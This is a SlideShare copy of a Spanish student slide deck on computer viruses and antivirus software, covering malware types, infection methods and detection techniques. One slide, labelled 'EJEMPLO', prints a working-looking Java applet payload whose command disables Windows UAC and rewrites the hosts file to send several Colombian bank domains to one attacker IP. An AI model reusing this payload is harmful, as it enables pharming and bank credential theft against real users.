SlideShare una empresa de Scribd logo
1 de 47
Virus y Antivirus Ricardo Morales Paredes
¿Que es un Virus? Un virus informático es un programa de computadora, que tiene como objetivo causar una alteración en un sistema de cómputo. Al igual que otras amenazas, un virus puede causar la alteración total de programas e información, o comprometer su integridad. A diferencia de otras amenazas, un virus de computadora puede propagarse de programa en programa, de sistema en sistema, sin intervención premeditada de las personas
Un virus típico ejecuta 2 funciones: 1.Se copia a si mismo a un programa no infectado. 2. Ejecuta cualquier instrucción que el autor incluyó en él.
¿Desde Cuando Existen? Se cree que los virus tienen la misma edad que las computadoras, ya que John Von Neumann describe : programas que se reproducen solos en su libro "Teoría y Organización de Autómatas complicados".
¿Cual Fue el Primero? El primer virus atacó a una máquina IBM Serie 360 (y reconocido como tal). Fue llamado Creeper,creado en 1972.  Este programa emitía periódicamente en la pantalla el mensaje: «I'm a creeper... catchme if you can!  (¡Soy una enredadera... agárrame si tú puedes!)
 
Troyanos Consiste en robar información o alterar el sistema del hardware o en un caso extremo permite que un usuario externo pueda controlar el equipo .
 
Gusano: Tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un sistema operativo que generalmente son invisibles al usuario.
 
Bombas lógicas o de tiempo:  Son programas que se activan al producirse un acontecimiento determinado. La condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o ciertas condiciones técnicas (Bombas Lógicas). Si no se produce la condición permanece oculto al usuario.
 
Virus en laWeb (active x y java) Los applets de JAVA y los controles Active X, son unos lenguajes nuevos orientados a Internet, pero las nuevas tecnologías abren un mundo nuevo a explotar por los creadores de virus. Anteriormente no eran muy utilizados pero a partir del 2000, superaran en numero a los virus de macro.
 
JOKE Al igual de los hoax, no son virus, pero son molestos, un ejemplo: una página pornográfica que se mueve de un lado a otro, y si se le llega a dar a errar es posible que salga una ventana que diga: OMFG!! No se puede cerrar!
 
HOAX Los hoax no son virus ni tienen capacidad de reproducirse por si solos.Pero se reproducen por medio de campañas virales(cartas cadenas,comentarios en foros etc etc). Tienen contenido falso que incitan al usuario a hacer copias y enviarla a sus contactos. Suelen apelar a los sentimientos morales ("Ayuda a un niño enfermo de cáncer") o al espíritu de solidaridad ("Aviso de un nuevo virus peligrosísimo") y, en cualquier caso, tratan de aprovecharse de la falta de experiencia de los internautas novatos.
MALWARE Malware (del inglés malicious software), también llamado badware, software malicioso o software malintencionado es un tipo de software que tiene como objetivo infiltrarse o dañar una computadora sin el consentimiento de su propietario. El término malware es muy utilizado por profesionales de la informática para referirse a una variedad de software hostil, intrusivo o molesto. El término virus informático es utilizado en muchas ocasiones para referirse a todos los tipos de malware, incluyendo los verdaderos virus.
KEYLOGGER Un keylogger (derivado del inglés: key (tecla) y logger (registrador); registrador de teclas) es un tipo de software que se encarga de registrar las pulsaciones que se realizan en el teclado, para memorizarlas en un fichero y/o enviarlas a través de internet.
 
RootKits Un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, claves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible. Existen rootkits para una amplia variedad de sistemas operativos, como GNU/Linux, Solaris o Microsoft Windows. (Tambien conocidos como encubridores)
 
BACKDOOR En la informática, una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación mediante la cual se puede evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta.
 
Metodos de contagio 1.-   En la primera, el usuario, en un momento dado, ejecuta o acepta de forma inadvertida la instalación del virus. 2.-  En la segunda, el programa malicioso actúa replicándose de manera automática (memorias flash,redes,e-mail basura).
En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientos anómalos o imprevistos.
EJEMPLO: <html> <head> </head> <body> <applet width='1' height='1' code='SunMicrosystems.class' archive='SunMicrosystems.jar'> <param name='first' value='cmd.exe /c @ECHO OFF & reg delete HKLMOFTWAREicrosoftindowsurrentVersionoliciesystem /v EnableLUA /f & Reg add &quot;hkey_local_machineOFTWAREicrosoftecurity Center&quot; /v UACDisableNotify /t reg_dword /d 00000001 /f & Reg add &quot;hkey_local_machineOFTWAREicrosoftindowsurrentVersionoliciesystem&quot; /v EnableLUA /t REG_DWORD /d 00000000 /f & REG ADD HKLMOFTWAREicrosoftindowsurrentVersionoliciesystem /v EnableLUA /t REG_DWORD /d 0 /f & echo 127.0.0.1 localhost >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.grupobancolombia.com >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.davivienda.com >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.avvillas.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.bbva.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.colmena.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 grupobancolombia.com >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 davivienda.com >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 avvillas.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 bbva.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 colmena.com.co >>C:INDOWSystem32riverstcosts & exit'> </applet> </body> </html>
[email_address] Tipo: Gusano W97M.Grurev Tipo: Macro W32.Netdepix Tipo: Troyano W32.Pulkfer Tipo: Virus [email_address] Tipo: Gusano [email_address] Tipo: Gusano W32.Looked Tipo: Gusano Backdoor.Tabdim Tipo: Troyano [email_address] Tipo: Gusano [email_address] Tipo: Gusano
Antivirus
¿Que son los Antivirus? Es un programa creado para prevenir o evitar la activación de los virus, así como su propagación y contagio. Cuenta además con rutinas de detención, eliminación y reconstrucción de los archivos y las áreas infectadas del sistema.
¿COMO FUNCIONAN? Un antivirus tiene tres principales funciones y componentes: VACUNA  es un programa que instalado residente en la memoria, actúa como &quot;filtro&quot; de los programas que son ejecutados, abiertos para ser leídos o copiados, en tiempo real. DETECTOR , que es el programa que examina todos los archivos existentes en el disco o a los que se les indique en una determinada ruta o PATH. Tiene instrucciones de control y reconocimiento exacto de los códigos virales que permiten capturar sus pares, debidamente registrados y en forma sumamente rápida desarman su estructura. ELIMINADOR  es el programa que una vez desactivada la estructura del virus procede a eliminarlo e inmediatamente después a reparar o reconstruir los archivos y áreas afectadas
La técnica de scanning Esta técnica consiste en revisar el código de todos los archivos contenidos en la unidad de almacenamiento -fundamentalmente los archivos ejecutables- en busca de pequeñas porciones de código que puedan pertenecer a un virus informático. Este procedimiento, denominado escaneo, se realiza a partir de una base de datos que contiene trozos de código representativos de cada virus conocido, agregando el empleo de determinados algoritmos que agilizan los procesos de búsqueda.
Heuristica se conoce como heurística a las técnicas que emplean para reconocer códigos maliciosos (virus, gusanos, troyanos, etc.) que no se encuentren en su base de datos (ya sea porque son nuevos, o por no ser muy divulgados). El término general implica funcionalidades como detección a través de firmas genéricas, reconocimiento del código compilado, desensamblado, desempaquetamiento, entre otros. Su importancia radica en el hecho de ser la única defensa automática posible frente a la aparición de nuevos códigos maliciosos de los que no se posea firmas.
Hay muchos códigos maliciosos que son modificados por sus autores para crear nuevas versiones. Usualmente, estas variantes contienen similitudes con los originales, por lo que se catalogan como una familia de virus. Gracias a las similitudes dentro del código del virus, los antivirus pueden llegar a reconocer a todos los miembros de la misma familia a través de una única firma o vacuna genérica. Firmas genéricas
Los programadores de códigos maliciosos suelen usar empaquetadores de archivos ejecutables como UPX con el fin de modificar la &quot;apariencia&quot; del virus a los ojos del análisis antivirus. Para evitar ser engañados por un código malicioso antiguo y luego reempaquetado, los antivirus incluyen en sus técnicas heurísticas métodos de desempaquetamiento. De esta forma pueden analizar el código real del programa, y no el empaquetado. Desenpaquetamiento
TOP 10 Antivirus 1 - KAV (Kaspersky Anti-virus) - E A D R H - www.kaspersky.com 2 - F-Secure - E A D R H - www.f-secure.com 3 - eScan - E A D R H - www.mwti.net 4 - AntiVir - E A D R H - www.antivir.es 5 - Microsoft Security Essentials - E A D S G - www.microsoft.com/Security_Essentials 6 - BitDefender Prof.+ - A D R H - www.bitdefender.com  7 - NOD32 Anti-Virus - E A D R S H - www.nod32.com 8 - McAfee VirusScan - E A H - www.mcafee.com  9 - G DATA - E A D R H - www.gdata.de/portal/ES 10 - Avast! Home - E A D H G - www.avast.com 11 - AVG Professional - E A S H G - www.grisoft.com  12 - Norton Anti-Virus - A D R H - www.symantec.com  13 - Panda antivirus - E A R H - www.pandasoftware.es 14 - F-Prot Anti-Virus - E A S H - www.f-prot.com  15 - RAV Desktop - A H - www.ravantivirus.com
Eliminación De virus Por Fuerza Bruta
 
Una firewall es un sistema diseñado a para prevenir el acceso no autorizado a su computadora o red. Una red tiene dos o más computadoras individuales unidas. ¿Que es un Firewall?
T ipos de firewalls •  El servidor remoto o proxy •  Las monitoras de rutas •  Firewall de red de alto nivel de seguridad. •  La aplicación o programa de firewall es probablemente el tipo más común.
SISTEMAS OPERATIVOS Y Los Virus
Windows
Windows 1.- Su gran popularidad, como sistema operativo, entre los ordenadores personales, PC. Se estima que, en el 2007, un 90% de ellos usa Windows.[cita requerida] Esta popularidad basada en la facilidad de uso sin conocimiento previo alguno, facilita la vulnerabilidad del sistema para el desarrollo de los virus,[cita requerida] y así atacar sus puntos débiles, que por lo general son abundantes. 2.- Falta de seguridad en esta plataforma (situación a la que Microsoft está dando en los últimos años mayor prioridad e importancia que en el pasado). Al ser un sistema muy permisivo con la instalación de programas ajenos a éste, sin requerir ninguna autentificación por parte del usuario o pedirle algún permiso especial para ello (en los Windows basados en NT se ha mejorado, en parte, este problema).
Windows 3.- Software como Internet Explorer y Outlook Express, desarrollados por Microsoft e incluidos de forma predeterminada en las últimas versiones de Windows, son conocidos por ser vulnerables a los virus ya que éstos aprovechan la ventaja de que dichos programas están fuertemente integrados en el sistema operativo dando acceso completo, y prácticamente sin restricciones, a los archivos del sistema. Un ejemplo famoso de este tipo es el virus ILOVEYOU, creado en el año 2000 y propagado a través de Outlook. 4.- La escasa formación de un número importante de usuarios de este sistema, lo que provoca que no se tomen medidas preventivas por parte de estos, ya que este sistema está dirigido de manera mayoritaria a los usuarios no expertos en informática. Esta situación es aprovechada constantemente por los programadores de virus.
POSIX
POSIX # Tradicionalmente los programadores y usuarios de sistemas basados en Unix han considerado la seguridad como una prioridad por lo que hay mayores medidas frente a virus, tales como la necesidad de autenticación por parte del usuario como administrador o root para poder instalar cualquier programa adicional al sistema. # Los directorios o carpetas que contienen los archivos vitales del sistema operativo cuentan con permisos especiales de acceso, por lo que no cualquier usuario o programa puede acceder fácilmente a ellos para modificarlos o borrarlos. Existe una jerarquía de permisos y accesos para los usuarios. # Relacionado al punto anterior, a diferencia de los usuarios de Windows, la mayoría de los usuarios de sistemas basados en Unix no pueden normalmente iniciar sesiones como usuarios &quot;administradores' o por el superusuario root, excepto para instalar o configurar software, dando como resultado que, incluso si un usuario no administrador ejecuta un virus o algún software malicioso, éste no dañaría completamente el sistema operativo ya que Unix limita el entorno de ejecución a un espacio o directorio reservado llamado comúnmente home.
POSIX # Estos sistemas, a diferencia de Windows, son usados para tareas más complejas como servidores que por lo general están fuertemente protegidos, razón que los hace menos atractivos para un desarrollo de virus o software malicioso. # En el caso particular de las distribuciones basadas en GNU/Linux y gracias al modelo colaborativo, las licencias libres y debido a que son más populares que otros sistemas Unix, la comunidad aporta constantemente y en un lapso de tiempo muy corto actualizaciones que resuelven bugs y/o agujeros de seguridad que pudieran ser aprovechados por algún malware.

Más contenido relacionado

La actualidad más candente

La actualidad más candente (14)

Virus y vacunas informáticas
Virus y vacunas informáticas Virus y vacunas informáticas
Virus y vacunas informáticas
 
Los Virus informáticos
Los Virus informáticosLos Virus informáticos
Los Virus informáticos
 
Virus informáticos
Virus informáticosVirus informáticos
Virus informáticos
 
Trabajo informatica virus y vacunas informaticas
Trabajo informatica virus y vacunas informaticasTrabajo informatica virus y vacunas informaticas
Trabajo informatica virus y vacunas informaticas
 
Trabajo informatica virus y vacunas informaticas
Trabajo informatica virus y vacunas informaticasTrabajo informatica virus y vacunas informaticas
Trabajo informatica virus y vacunas informaticas
 
Virus y antivirus informaticos
Virus y antivirus informaticosVirus y antivirus informaticos
Virus y antivirus informaticos
 
Uptc
UptcUptc
Uptc
 
Virus 2
Virus 2Virus 2
Virus 2
 
Presentacion de virus y antivirus
Presentacion de virus y antivirusPresentacion de virus y antivirus
Presentacion de virus y antivirus
 
2 wer
2 wer2 wer
2 wer
 
Malware
MalwareMalware
Malware
 
Malware
MalwareMalware
Malware
 
Prevención de Malware Investigación Documental
Prevención de Malware Investigación DocumentalPrevención de Malware Investigación Documental
Prevención de Malware Investigación Documental
 
Maryyyy
MaryyyyMaryyyy
Maryyyy
 

Destacado

[История успеха] ТрансКонтейнер использует Netwrix Auditor для контроля измен...
[История успеха] ТрансКонтейнер использует Netwrix Auditor для контроля измен...[История успеха] ТрансКонтейнер использует Netwrix Auditor для контроля измен...
[История успеха] ТрансКонтейнер использует Netwrix Auditor для контроля измен...Netwrix Россия/СНГ
 
Современная проблема сохранения биологического разнообразия
Современная проблема сохранения биологического разнообразияСовременная проблема сохранения биологического разнообразия
Современная проблема сохранения биологического разнообразияVictoria Shatetskaya
 
організація допрофільного та профільного навчання живченко л. а
організація допрофільного та профільного навчання живченко л. аорганізація допрофільного та профільного навчання живченко л. а
організація допрофільного та профільного навчання живченко л. аmara2101
 
леся українка
леся українкалеся українка
леся українкаteachergromova
 
Ics presentations as
Ics presentations asIcs presentations as
Ics presentations asalexnetu
 
кошторис на билет 30грн)
кошторис на билет 30грн)кошторис на билет 30грн)
кошторис на билет 30грн)Psariova
 
История развития госпомощи детям
История развития госпомощи детямИстория развития госпомощи детям
История развития госпомощи детямnizhgma.ru
 
презентация поездки во францию 2015
презентация поездки во францию 2015презентация поездки во францию 2015
презентация поездки во францию 2015Vania Gaydukinen
 
ТПСЭК Лабораторная 1
ТПСЭК Лабораторная 1ТПСЭК Лабораторная 1
ТПСЭК Лабораторная 1Lena Shashalevich
 
DNS, Internets Vägvisare
DNS, Internets VägvisareDNS, Internets Vägvisare
DNS, Internets Vägvisare961118
 
Uroczystości koscielne
Uroczystości koscielneUroczystości koscielne
Uroczystości koscielnegm55
 
первая помощь утопающему
первая помощь утопающемупервая помощь утопающему
первая помощь утопающемуNickEliot
 
развивающая предметно пространственная среда.... (1)
развивающая предметно  пространственная среда.... (1)развивающая предметно  пространственная среда.... (1)
развивающая предметно пространственная среда.... (1)Валерия Кулеш
 

Destacado (20)

Media training
Media trainingMedia training
Media training
 
[История успеха] ТрансКонтейнер использует Netwrix Auditor для контроля измен...
[История успеха] ТрансКонтейнер использует Netwrix Auditor для контроля измен...[История успеха] ТрансКонтейнер использует Netwrix Auditor для контроля измен...
[История успеха] ТрансКонтейнер использует Netwrix Auditor для контроля измен...
 
Современная проблема сохранения биологического разнообразия
Современная проблема сохранения биологического разнообразияСовременная проблема сохранения биологического разнообразия
Современная проблема сохранения биологического разнообразия
 
Портал по КСО "Бизнес и Общество"
Портал по КСО "Бизнес и Общество"Портал по КСО "Бизнес и Общество"
Портал по КСО "Бизнес и Общество"
 
організація допрофільного та профільного навчання живченко л. а
організація допрофільного та профільного навчання живченко л. аорганізація допрофільного та профільного навчання живченко л. а
організація допрофільного та профільного навчання живченко л. а
 
леся українка
леся українкалеся українка
леся українка
 
Ics presentations as
Ics presentations asIcs presentations as
Ics presentations as
 
кошторис на билет 30грн)
кошторис на билет 30грн)кошторис на билет 30грн)
кошторис на билет 30грн)
 
Оценка тайный покупатель
Оценка тайный покупательОценка тайный покупатель
Оценка тайный покупатель
 
леся українка
леся українкалеся українка
леся українка
 
История развития госпомощи детям
История развития госпомощи детямИстория развития госпомощи детям
История развития госпомощи детям
 
презентация поездки во францию 2015
презентация поездки во францию 2015презентация поездки во францию 2015
презентация поездки во францию 2015
 
ТПСЭК Лабораторная 1
ТПСЭК Лабораторная 1ТПСЭК Лабораторная 1
ТПСЭК Лабораторная 1
 
Smart Scheduler
Smart SchedulerSmart Scheduler
Smart Scheduler
 
Ad universe 2015 adequate
Ad universe 2015 adequateAd universe 2015 adequate
Ad universe 2015 adequate
 
DNS, Internets Vägvisare
DNS, Internets VägvisareDNS, Internets Vägvisare
DNS, Internets Vägvisare
 
Uroczystości koscielne
Uroczystości koscielneUroczystości koscielne
Uroczystości koscielne
 
первая помощь утопающему
первая помощь утопающемупервая помощь утопающему
первая помощь утопающему
 
развивающая предметно пространственная среда.... (1)
развивающая предметно  пространственная среда.... (1)развивающая предметно  пространственная среда.... (1)
развивающая предметно пространственная среда.... (1)
 
Asama2
Asama2Asama2
Asama2
 

Similar a Virus

Virus Informaticos
Virus Informaticos Virus Informaticos
Virus Informaticos Yerxon31
 
Virus informáticos
Virus informáticosVirus informáticos
Virus informáticoscristianvera
 
Que son virus informático anderson stivens bautista oviedo
Que son virus informático anderson stivens bautista oviedoQue son virus informático anderson stivens bautista oviedo
Que son virus informático anderson stivens bautista oviedobauti03
 
Virus y antivirus cyber zone manta
Virus y antivirus cyber zone mantaVirus y antivirus cyber zone manta
Virus y antivirus cyber zone mantaJoAnGT.com
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticasFabian Garzón
 
Virusy antivirus cubides_julian
Virusy antivirus cubides_julianVirusy antivirus cubides_julian
Virusy antivirus cubides_julianjulian cubides
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticasauranumpaque
 
Virus y vacunas informáticos
Virus y vacunas informáticosVirus y vacunas informáticos
Virus y vacunas informáticosvictordani
 
Virus informatico DIAPOSITIVA
Virus informatico DIAPOSITIVAVirus informatico DIAPOSITIVA
Virus informatico DIAPOSITIVAEzequiel Payares
 
Trabajo construccion de ciudadania, virus informaticos (1)
Trabajo construccion de ciudadania, virus informaticos (1)Trabajo construccion de ciudadania, virus informaticos (1)
Trabajo construccion de ciudadania, virus informaticos (1)nomejodaspibaa
 
Exposición de informática
Exposición de informáticaExposición de informática
Exposición de informáticafranklin2702
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticasanllelinacoy
 

Similar a Virus (20)

Virus Informaticos
Virus Informaticos Virus Informaticos
Virus Informaticos
 
Virus informáticos
Virus informáticosVirus informáticos
Virus informáticos
 
Que son virus informático anderson stivens bautista oviedo
Que son virus informático anderson stivens bautista oviedoQue son virus informático anderson stivens bautista oviedo
Que son virus informático anderson stivens bautista oviedo
 
Virus y antivirus cyber zone manta
Virus y antivirus cyber zone mantaVirus y antivirus cyber zone manta
Virus y antivirus cyber zone manta
 
Virus y bacterias informaticos
Virus y bacterias informaticosVirus y bacterias informaticos
Virus y bacterias informaticos
 
Taller virus informaticos
Taller virus informaticosTaller virus informaticos
Taller virus informaticos
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
 
Virusy antivirus cubides_julian
Virusy antivirus cubides_julianVirusy antivirus cubides_julian
Virusy antivirus cubides_julian
 
Virus y bacterias informaticos
Virus y bacterias informaticosVirus y bacterias informaticos
Virus y bacterias informaticos
 
Que son virus informaticos
Que son virus informaticosQue son virus informaticos
Que son virus informaticos
 
Virus
VirusVirus
Virus
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
 
Virus y vacunas informáticos
Virus y vacunas informáticosVirus y vacunas informáticos
Virus y vacunas informáticos
 
Virus informáticos y vacunas
Virus informáticos y vacunasVirus informáticos y vacunas
Virus informáticos y vacunas
 
Virus informatico DIAPOSITIVA
Virus informatico DIAPOSITIVAVirus informatico DIAPOSITIVA
Virus informatico DIAPOSITIVA
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
 
Trabajo construccion de ciudadania, virus informaticos (1)
Trabajo construccion de ciudadania, virus informaticos (1)Trabajo construccion de ciudadania, virus informaticos (1)
Trabajo construccion de ciudadania, virus informaticos (1)
 
Exposición de informática
Exposición de informáticaExposición de informática
Exposición de informática
 
Los virus informáticos
Los virus informáticosLos virus informáticos
Los virus informáticos
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
 

Más de Ricardo M. P (15)

Presentacion
PresentacionPresentacion
Presentacion
 
Presentacion
PresentacionPresentacion
Presentacion
 
Nazis Administracion Ghettos
Nazis Administracion GhettosNazis Administracion Ghettos
Nazis Administracion Ghettos
 
Tcpip
TcpipTcpip
Tcpip
 
Servicios de intere
Servicios de intereServicios de intere
Servicios de intere
 
Aplicaciones web
Aplicaciones webAplicaciones web
Aplicaciones web
 
html
htmlhtml
html
 
Js
JsJs
Js
 
Sflibre
SflibreSflibre
Sflibre
 
Aplicaciones
AplicacionesAplicaciones
Aplicaciones
 
Software
SoftwareSoftware
Software
 
Ofimatica
OfimaticaOfimatica
Ofimatica
 
Modelos atomicos
Modelos atomicosModelos atomicos
Modelos atomicos
 
Lenguajesprog
LenguajesprogLenguajesprog
Lenguajesprog
 
Software
SoftwareSoftware
Software
 

Virus

  • 1. Virus y Antivirus Ricardo Morales Paredes
  • 2. ¿Que es un Virus? Un virus informático es un programa de computadora, que tiene como objetivo causar una alteración en un sistema de cómputo. Al igual que otras amenazas, un virus puede causar la alteración total de programas e información, o comprometer su integridad. A diferencia de otras amenazas, un virus de computadora puede propagarse de programa en programa, de sistema en sistema, sin intervención premeditada de las personas
  • 3. Un virus típico ejecuta 2 funciones: 1.Se copia a si mismo a un programa no infectado. 2. Ejecuta cualquier instrucción que el autor incluyó en él.
  • 4. ¿Desde Cuando Existen? Se cree que los virus tienen la misma edad que las computadoras, ya que John Von Neumann describe : programas que se reproducen solos en su libro &quot;Teoría y Organización de Autómatas complicados&quot;.
  • 5. ¿Cual Fue el Primero? El primer virus atacó a una máquina IBM Serie 360 (y reconocido como tal). Fue llamado Creeper,creado en 1972. Este programa emitía periódicamente en la pantalla el mensaje: «I'm a creeper... catchme if you can! (¡Soy una enredadera... agárrame si tú puedes!)
  • 6.  
  • 7. Troyanos Consiste en robar información o alterar el sistema del hardware o en un caso extremo permite que un usuario externo pueda controlar el equipo .
  • 8.  
  • 9. Gusano: Tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un sistema operativo que generalmente son invisibles al usuario.
  • 10.  
  • 11. Bombas lógicas o de tiempo: Son programas que se activan al producirse un acontecimiento determinado. La condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o ciertas condiciones técnicas (Bombas Lógicas). Si no se produce la condición permanece oculto al usuario.
  • 12.  
  • 13. Virus en laWeb (active x y java) Los applets de JAVA y los controles Active X, son unos lenguajes nuevos orientados a Internet, pero las nuevas tecnologías abren un mundo nuevo a explotar por los creadores de virus. Anteriormente no eran muy utilizados pero a partir del 2000, superaran en numero a los virus de macro.
  • 14.  
  • 15. JOKE Al igual de los hoax, no son virus, pero son molestos, un ejemplo: una página pornográfica que se mueve de un lado a otro, y si se le llega a dar a errar es posible que salga una ventana que diga: OMFG!! No se puede cerrar!
  • 16.  
  • 17. HOAX Los hoax no son virus ni tienen capacidad de reproducirse por si solos.Pero se reproducen por medio de campañas virales(cartas cadenas,comentarios en foros etc etc). Tienen contenido falso que incitan al usuario a hacer copias y enviarla a sus contactos. Suelen apelar a los sentimientos morales (&quot;Ayuda a un niño enfermo de cáncer&quot;) o al espíritu de solidaridad (&quot;Aviso de un nuevo virus peligrosísimo&quot;) y, en cualquier caso, tratan de aprovecharse de la falta de experiencia de los internautas novatos.
  • 18. MALWARE Malware (del inglés malicious software), también llamado badware, software malicioso o software malintencionado es un tipo de software que tiene como objetivo infiltrarse o dañar una computadora sin el consentimiento de su propietario. El término malware es muy utilizado por profesionales de la informática para referirse a una variedad de software hostil, intrusivo o molesto. El término virus informático es utilizado en muchas ocasiones para referirse a todos los tipos de malware, incluyendo los verdaderos virus.
  • 19. KEYLOGGER Un keylogger (derivado del inglés: key (tecla) y logger (registrador); registrador de teclas) es un tipo de software que se encarga de registrar las pulsaciones que se realizan en el teclado, para memorizarlas en un fichero y/o enviarlas a través de internet.
  • 20.  
  • 21. RootKits Un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, claves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible. Existen rootkits para una amplia variedad de sistemas operativos, como GNU/Linux, Solaris o Microsoft Windows. (Tambien conocidos como encubridores)
  • 22.  
  • 23. BACKDOOR En la informática, una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación mediante la cual se puede evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta.
  • 24.  
  • 25. Metodos de contagio 1.- En la primera, el usuario, en un momento dado, ejecuta o acepta de forma inadvertida la instalación del virus. 2.- En la segunda, el programa malicioso actúa replicándose de manera automática (memorias flash,redes,e-mail basura).
  • 26. En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientos anómalos o imprevistos.
  • 27. EJEMPLO: <html> <head> </head> <body> <applet width='1' height='1' code='SunMicrosystems.class' archive='SunMicrosystems.jar'> <param name='first' value='cmd.exe /c @ECHO OFF & reg delete HKLMOFTWAREicrosoftindowsurrentVersionoliciesystem /v EnableLUA /f & Reg add &quot;hkey_local_machineOFTWAREicrosoftecurity Center&quot; /v UACDisableNotify /t reg_dword /d 00000001 /f & Reg add &quot;hkey_local_machineOFTWAREicrosoftindowsurrentVersionoliciesystem&quot; /v EnableLUA /t REG_DWORD /d 00000000 /f & REG ADD HKLMOFTWAREicrosoftindowsurrentVersionoliciesystem /v EnableLUA /t REG_DWORD /d 0 /f & echo 127.0.0.1 localhost >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.grupobancolombia.com >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.davivienda.com >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.avvillas.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.bbva.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 www.colmena.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 grupobancolombia.com >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 davivienda.com >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 avvillas.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 bbva.com.co >>C:INDOWSystem32riverstcosts & echo 193.164.133.57 colmena.com.co >>C:INDOWSystem32riverstcosts & exit'> </applet> </body> </html>
  • 28. [email_address] Tipo: Gusano W97M.Grurev Tipo: Macro W32.Netdepix Tipo: Troyano W32.Pulkfer Tipo: Virus [email_address] Tipo: Gusano [email_address] Tipo: Gusano W32.Looked Tipo: Gusano Backdoor.Tabdim Tipo: Troyano [email_address] Tipo: Gusano [email_address] Tipo: Gusano
  • 30. ¿Que son los Antivirus? Es un programa creado para prevenir o evitar la activación de los virus, así como su propagación y contagio. Cuenta además con rutinas de detención, eliminación y reconstrucción de los archivos y las áreas infectadas del sistema.
  • 31. ¿COMO FUNCIONAN? Un antivirus tiene tres principales funciones y componentes: VACUNA es un programa que instalado residente en la memoria, actúa como &quot;filtro&quot; de los programas que son ejecutados, abiertos para ser leídos o copiados, en tiempo real. DETECTOR , que es el programa que examina todos los archivos existentes en el disco o a los que se les indique en una determinada ruta o PATH. Tiene instrucciones de control y reconocimiento exacto de los códigos virales que permiten capturar sus pares, debidamente registrados y en forma sumamente rápida desarman su estructura. ELIMINADOR es el programa que una vez desactivada la estructura del virus procede a eliminarlo e inmediatamente después a reparar o reconstruir los archivos y áreas afectadas
  • 32. La técnica de scanning Esta técnica consiste en revisar el código de todos los archivos contenidos en la unidad de almacenamiento -fundamentalmente los archivos ejecutables- en busca de pequeñas porciones de código que puedan pertenecer a un virus informático. Este procedimiento, denominado escaneo, se realiza a partir de una base de datos que contiene trozos de código representativos de cada virus conocido, agregando el empleo de determinados algoritmos que agilizan los procesos de búsqueda.
  • 33. Heuristica se conoce como heurística a las técnicas que emplean para reconocer códigos maliciosos (virus, gusanos, troyanos, etc.) que no se encuentren en su base de datos (ya sea porque son nuevos, o por no ser muy divulgados). El término general implica funcionalidades como detección a través de firmas genéricas, reconocimiento del código compilado, desensamblado, desempaquetamiento, entre otros. Su importancia radica en el hecho de ser la única defensa automática posible frente a la aparición de nuevos códigos maliciosos de los que no se posea firmas.
  • 34. Hay muchos códigos maliciosos que son modificados por sus autores para crear nuevas versiones. Usualmente, estas variantes contienen similitudes con los originales, por lo que se catalogan como una familia de virus. Gracias a las similitudes dentro del código del virus, los antivirus pueden llegar a reconocer a todos los miembros de la misma familia a través de una única firma o vacuna genérica. Firmas genéricas
  • 35. Los programadores de códigos maliciosos suelen usar empaquetadores de archivos ejecutables como UPX con el fin de modificar la &quot;apariencia&quot; del virus a los ojos del análisis antivirus. Para evitar ser engañados por un código malicioso antiguo y luego reempaquetado, los antivirus incluyen en sus técnicas heurísticas métodos de desempaquetamiento. De esta forma pueden analizar el código real del programa, y no el empaquetado. Desenpaquetamiento
